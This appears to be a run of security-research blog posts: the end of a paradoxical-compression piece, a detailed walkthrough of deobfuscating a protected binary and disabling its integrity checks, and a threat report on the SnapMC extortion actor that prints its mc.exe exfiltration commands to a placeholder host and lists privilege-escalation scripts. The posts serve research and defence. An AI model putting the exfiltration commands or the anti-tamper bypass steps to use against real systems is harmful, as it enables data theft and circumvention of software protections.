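Here is a hedged Python sketch of this keyed construction, again with zlib standing in for DEFLATE; the exact framing (little-endian 64-bit counter followed by a 128-bit truncated HMAC/SHA-256) is our choice of layout:

import hmac, hashlib, struct, zlib

def _mac(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()[:16]   # truncated to 128 bits

def compress(key: bytes, x: bytes) -> bytes:
    d = zlib.compress(x)
    if len(d) + 24 < len(x):                      # room for 8-byte counter + 16-byte MAC
        body = d + struct.pack('<Q', 0)
        return body + _mac(key, body)
    if len(x) >= 24 and hmac.compare_digest(x[-16:], _mac(key, x[:-16])):
        d2, c = x[:-24], struct.unpack('<Q', x[-24:-16])[0]
        body = d2 + struct.pack('<Q', c + 1)      # reaching c = 2**64 - 1 is impractical
        return body + _mac(key, body)
    return x

def decompress(key: bytes, y: bytes) -> bytes:
    if len(y) >= 24 and hmac.compare_digest(y[-16:], _mac(key, y[:-16])):
        d, c = y[:-24], struct.unpack('<Q', y[-24:-16])[0]
        if c == 0:
            return zlib.decompress(d)
        body = d + struct.pack('<Q', c - 1)
        return body + _mac(key, body)
    return y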

This construction achieves paradoxical compression because the problematic inputs (with a counter c close to overflow) can be obtained only from the compression system itself (since we assume the MAC to be unforgeable), and the compression system produces new counter values only in minimal increments; getting a problematic input would then require too many invocations of the compression system (2^64 in this example) to be done in practice. If problematic inputs cannot be built, we win: nobody can make our compression/decompression system fail.

Removing the Shared Key Requirement

The construction above uses a MAC that relies on a shared secret value (the MAC key) between the compression and decompression systems. This is a restrictive model and we would like to remove this requirement. Can we build the same system, but in a keyless fashion?

We can, with a verifiable delay function (VDF). Such functions have been recently defined. In a nutshell, a VDF is a sort of hash function that takes a configurable time to compute (with no known shortcut) but also comes with a proof of correct computation, and the proof can be verified at a low computational cost. This is an extension of earlier time-lock puzzles. One can think of a VDF as a time-lock puzzle that can be verified to have been properly set.

In our paradoxical compression system described above, we used a MAC with a secret key in order to prevent outsiders from building problematic inputs. We can replace the MAC with a VDF, using the counter itself as the work factor: an input with a very high counter value cannot be built in practice, because that would mean a very high work factor. The secrecy of the key is replaced with a “computational wall”: the VDF becomes too expensive to compute for high counter values.
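As a toy illustration of the sequential computation at the core of such a VDF (this is only the slow part; the proof of correct computation, which is what makes it a verifiable delay function, is omitted):

def vdf_eval(x: int, c: int, n: int) -> int:
    # Computes x^(2^c) mod n via c sequential squarings; with the
    # factorization of n unknown, no shortcut is known.
    for _ in range(c):
        x = x * x % n
    return x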

I implemented this method, using a VDF designed by Wesolowski. It is based on computing squarings modulo a big composite integer (i.e. an RSA modulus): raising an input x to the power 2^c modulo n is postulated to require c successive squarings modulo n, with no known “shortcut” if the factorization of n is not known. Wesolowski’s VDF comes with a compact proof of correct computation, which can be efficiently verified. The implementation is in C# (mostly because C# has a DEFLATE implementation in its standard library, and I already had some C# implementation of the SHA3/SHAKE hash functions, and of big integers with primality tests). The 2048-bit modulus was generated as a random RSA key (I discarded the prime factors; now nobody knows them). The code can be obtained on GitHub.

The code is open-source and you may reuse it as you will (under the MIT license), but of course achieving paradoxical compression is not, in fact, a very useful property: it does not solve any real, practical problem. However, it is an enjoyable party trick.

A Look At Some Real-World Obfuscation Techniques

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing, and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT (Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug and various other detection mechanisms, which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to the C++ language’s canonical internal initialization functions, such as _initterm() and _initterm_e().

While the dynamic method is usually sufficient, the samples below highlight two automated implementations: a Python script that successfully handled a simple packer which did not require import rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.
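As a small illustration of the rebuilding step, here is a hedged pefile sketch that writes dumped section contents back over a file image and resets the entry point; how the runtime bytes and the OEP were recovered is left out, import rebuilding is omitted, and the names are ours:

import pefile

def rebuild(dump_path, out_path, runtime_sections, oep_rva):
    '''runtime_sections: {section name: bytes dumped from memory};
    oep_rva: the recovered original entry point (RVA).'''
    pe = pefile.PE(dump_path)
    for section in pe.sections:
        name = section.Name.rstrip(b'\x00').decode()
        if name in runtime_sections:
            pe.set_bytes_at_rva(section.VirtualAddress, runtime_sections[name])
    pe.OPTIONAL_HEADER.AddressOfEntryPoint = oep_rva
    pe.write(out_path)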

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of anti-debug mechanisms, and integrity checks. As a preliminary step, those can be identified by running the binary instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that requires neither a dynamic engine nor a real memory context. The first step is, for each function, to identify the dispatch loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map; the original function’s logic is implemented within the BBL-chains located between the blocks belonging to the loop:
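A hedged Miasm sketch of that mapping step follows; FUNC_ADDR, STATE_REG, DISPATCH_ADDR and NUM_STATES are placeholders for values recovered during analysis, and the exact API varies between Miasm versions:

from miasm.analysis.binary import Container
from miasm.analysis.machine import Machine
from miasm.ir.symbexec import SymbolicExecutionEngine
from miasm.expression.expression import ExprInt

cont = Container.from_stream(open('unpacked.bin', 'rb'))
machine = Machine(cont.arch)
mdis = machine.dis_engine(cont.bin_stream, loc_db=cont.loc_db)
asmcfg = mdis.dis_multiblock(FUNC_ADDR)             # the obfuscated function
lifter = machine.lifter_model_call(cont.loc_db)
ircfg = lifter.new_ircfg_from_asmcfg(asmcfg)

index_to_offset = {}
for index in range(NUM_STATES):                     # all possible state values
    symb = SymbolicExecutionEngine(lifter)
    symb.symbols[STATE_REG] = ExprInt(index, 32)    # pin the state variable
    dst = symb.run_block_at(ircfg, DISPATCH_ADDR)   # evaluate the dispatcher
    index_to_offset[index] = dst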

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect the BBL-chains with each other and recreate the original control flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains bear only a single, static destination, which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as the state variable has been identified, the next step is to identify the determinant symbols, i.e., the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the remaining task is to identify what condition these determinants fulfill, as well as which destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means of finding input values leading to new paths. Here, the deobfuscator uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 whether two valid destination indexes (D1 and D2) exist such that the following holds (a Z3 sketch follows the list):

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2
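To make this concrete, here is a hedged Z3 sketch of that query for the equal pattern; state_expr stands for the state-register expression recovered from the IR, replaced by a placeholder so the snippet runs on its own:

from z3 import BitVec, BitVecVal, Solver, If, ForAll, sat

mod0 = BitVec('mod0', 32)
mod1 = BitVec('mod1', 32)
# Placeholder for the recovered state-register expression.
state_expr = If(mod0 == mod1, BitVecVal(5, 32), BitVecVal(9, 32))

D1 = BitVec('D1', 32)
D2 = BitVec('D2', 32)
solver = Solver()
solver.add(D1 != D2)
solver.add(ForAll([mod0, mod1], state_expr == If(mod0 == mod1, D1, D2)))

if solver.check() == sat:
    print('equal pattern:', solver.model())   # here: D1 = 5, D2 = 9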

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where:

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory)
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph-matching algorithm (using Miasm’s “MatchGraphJoker” expressions), whose regular shape also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates and recording their reads against the .text section, in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.
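For reference, the loop shape can be matched with MatchGraphJoker along these lines; the two-block loop below is a simplified stand-in for the real hash-loop pattern:

from miasm.core.graph import MatchGraphJoker

head = MatchGraphJoker(name='head', restrict_in=False)
body = MatchGraphJoker(name='body')
exit_ = MatchGraphJoker(name='exit', restrict_in=False, restrict_out=False)

pattern = head >> body >> head    # back-edge: candidate loop
pattern += head >> exit_          # plus a loop exit

for candidate in pattern.match(asmcfg):    # asmcfg: the function's CFG
    print(candidate[head], candidate[body], candidate[exit_])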

“Dead” Instructions Removal

The resulting assembly is unflattened and no longer includes the integrity checks, but it still includes a number of “dead” instructions which have no effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and the subsequent ones. Consequently, the first assignment to EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph again, but this time keeping a one-to-many map of assembly to IR instructions, the following pass removes the assembly instructions for which the depgraph has determined that all corresponding IR instructions are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger, can be applied automatically to each block bearing a single successor, provided the successor has only a single predecessor. The error paths can also be identified and “cauterized”; this should be a no-op, since they should never be executed, but it smooths the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples, only a few will be covered here, as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and sends the execution into a stack-mangling loop before continuing execution, which leads to a certain crash, obfuscating the context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code in the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on the stack. Additionally, the Windows interrupt handler processes every debug exception assuming it stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements would need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300A == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.
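A hedged sketch of such an instrumentation follows; IMAGE_BASE, text_bytes, STACK_BASE, ENTRY_ADDR and EXIT_ADDR are placeholders, and the jitter setup differs between Miasm versions:

from miasm.analysis.machine import Machine
from miasm.core.locationdb import LocationDB
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE, PAGE_EXEC

machine = Machine('x86_64')
jitter = machine.jitter(LocationDB(), 'python')

jitter.vm.add_memory_page(IMAGE_BASE, PAGE_READ | PAGE_EXEC, text_bytes)
jitter.vm.add_memory_page(STACK_BASE, PAGE_READ | PAGE_WRITE, b'\x00' * 0x10000)
jitter.cpu.RSP = STACK_BASE + 0x8000

jitter.jit.log_newbloc = True          # log every newly executed basic block

def stop(jitter):
    jitter.running = False             # halt once the region's exit is reached
    return True

jitter.add_breakpoint(EXIT_ADDR, stop)
jitter.init_run(ENTRY_ADDR)
jitter.continue_run()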

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located at two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32-bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing-up-my-sleeve number, based on the golden ratio, and notably used by RC5. In this instance, however, the expression points at another Feistel cipher: TEA, the Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.
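
The final Python script shown later relies on a Tea helper class that is not part of the listing. A minimal sketch of what such a helper might look like is given below, assuming independent (ECB-style) decryption of 8-byte blocks and a little-endian word layout:

import struct

class Tea:
    '''Minimal TEA decryption helper (sketch): 32 rounds per 8-byte block,
    blocks decrypted independently; little-endian layout is an assumption.'''
    DELTA = 0x9E3779B9
    MASK = 0xFFFFFFFF

    def __init__(self, key):
        self.k = struct.unpack('<4I', key)

    def decrypt_block(self, block):
        v0, v1 = struct.unpack('<2I', block)
        k0, k1, k2, k3 = self.k
        s = (self.DELTA * 32) & self.MASK   # 0xC6EF3720, see the C code above
        for _ in range(32):
            v1 = (v1 - ((((v0 << 4) + k2) & self.MASK) ^ ((v0 + s) & self.MASK) ^ (((v0 >> 5) + k3) & self.MASK))) & self.MASK
            v0 = (v0 - ((((v1 << 4) + k0) & self.MASK) ^ ((v1 + s) & self.MASK) ^ (((v1 >> 5) + k1) & self.MASK))) & self.MASK
            s = (s - self.DELTA) & self.MASK
        return struct.pack('<2I', v0, v1)

    def decrypt(self, data):
        return b''.join(self.decrypt_block(data[i:i+8])
                        for i in range(0, len(data), 8))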

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the top bit to indicate whether one or more additional bytes should be read to compute the final value.
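
As a concrete illustration, a minimal decoder for this encoding (the function name is ours) could look like:

def read_varint(data, i=0):
    # Decode one unsigned base-128 value: the low 7 bits of each byte carry
    # data, the high bit signals that another byte follows.
    val, shift = 0, 0
    while True:
        b = data[i]
        val |= (b & 0x7F) << shift
        i += 1
        if not b & 0x80:
            return val, i
        shift += 7

assert read_varint(b'\xC8\x03') == (456, 2)   # 0x48 | (0x03 << 7) = 456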

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0xEFCDAB89
0xF9396DD4^0x6183B12A ==> 0x98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0x10325476
0xFB95EF83^0x38470E73 ==> 0xC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator, reimplemented in Python below, was verified to produce the same digest as when running under a debugger or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped-offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

import hashlib
import struct
from sys import argv

# Helper dependencies assumed from supporting tooling (not shown here):
# PE provides virt2off/rva2off address translation over the loaded image,
# and Tea provides TEA block decryption (see the sketch above).

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped < current+size:
      # Hash everything up to the next skipped offset, then jump past it.
      blob = pe[pe.rva2off(current):pe.rva2off(current)+(next_skipped-current)]
      size -= len(blob)+8
      assert size >= 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.


SnapMC skips ransomware, steals data

Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations.

Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses.

Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. SnapMC however has shown itself capable of actual data breach attacks. The extortion emails we have seen from SnapMC give victims 24 hours to get in contact and 72 hours to negotiate. Even so, we have seen this actor start increasing the pressure well before countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets.

Modus operandi

Initial access

At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:

  • Remote code execution in Telerik UI for ASP.NET AJAX [1]
  • SQL injections

After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2].

Directly afterwards PowerShell is started to perform some standard reconnaissance activity:

  • whoami
  • whoami /priv
  • wmic logicaldisk get caption,description,providername
  • net users /priv

Note that in the last command the adversary used the /priv option, which is not a valid option for the net users command.

Privilege Escalation

In most of the cases we analyzed the threat actor did not perform privilege escalation. However in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:

  • Invoke-Nightmare [3]
  • Invoke-JuicyPotato [4]
  • Invoke-ServiceAbuse [5]
  • Invoke-EventVwrBypass [6]
  • Invoke-PrivescAudit [7]

Collection & Exfiltration

We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:

  • C:\Windows\Temp\
  • C:\Windows\Temp\Azure
  • C:\Windows\Temp\Vmware

SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility.

The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio.

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET>

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY>

Mitigations

First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet-connected) devices up-to-date is the most effective way to prevent falling victim to these types of attacks. Make sure to identify where vulnerable software resides within your network by regularly performing vulnerability scans. Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident. Worth mentioning: when reference-testing the exploitability of specific versions of Telerik, it became clear that when the software component resided behind a well-configured Web Application Firewall (WAF), the exploit would be unsuccessful. Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection and efficient response will reduce the damage even before it materializes.

Conclusion

NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over time, as they take less time and require less in-depth technical knowledge or skill than a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware, while in a data breach extortion attack most of the activity could even be automated, taking less time while still having a significant impact. Therefore, making sure you are able to detect such attacks, in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.

